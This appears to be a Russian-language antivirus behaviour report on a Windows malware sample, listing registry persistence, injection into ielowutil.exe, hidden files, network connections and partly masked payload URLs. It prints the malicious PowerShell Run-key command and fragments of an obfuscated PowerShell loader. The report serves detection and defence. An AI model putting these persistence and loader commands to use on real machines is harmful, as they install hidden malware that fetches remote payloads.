Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'Kles' = '%GULOM% -w 1 $Udst=(Get-ItemProperty -Path 'HKCU:\Yacareskel\').Adres;%GULOM% ($Udst)'
Вредоносные функции
Внедряет код в
следующие пользовательские процессы:
- ielowutil.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\bit83cf.tmp
- %APPDATA%\bit98d6.tmp
- %ALLUSERSPROFILE%\logwes.dat
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\bit83cf.tmp
- %APPDATA%\bit98d6.tmp
- %ALLUSERSPROFILE%\logwes.dat
Перемещает следующие файлы
- %APPDATA%\bit83cf.tmp в %APPDATA%\startsi.bou
- %APPDATA%\bit98d6.tmp в %APPDATA%\startsi.bou
Сетевая активность
Подключается к
- '91.##4.197.9':80
- 'se####m.duckdns.org':2424
- 'ge###ugin.net':80
TCP
Запросы HTTP GET
- http://91.##4.197.9/neww/ethol.psp
- http://91.##4.197.9/new/FqLJhTRjp228.bin
- http://ge###ugin.net/json.gp
Другие
- 'se####m.duckdns.org':2424
UDP
- DNS ASK se####m.duckdns.org
- DNS ASK ge###ugin.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Potteringd1979 ([String]$Skovturene){$Kanukaoops=$Skovturene.toCharArray();For($Fashesuna=5; $Fashesuna -lt $Kanukaoops.count-1; $Fashesuna+=(5+1)){$Elec+=$Kanukaoops[$Fashesuna]};$El...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Potteringd1979 ([String]$Skovturene){$Kanukaoops=$Skovturene.toCharArray();For($Fashesuna=5; $Fashesuna -lt $Kanukaoops.count-1; $Fashesuna+=(5+1)){$Elec+=$Kanukaoops[$Fashesuna]};$El...
- '%ProgramFiles%\internet explorer\ielowutil.exe'
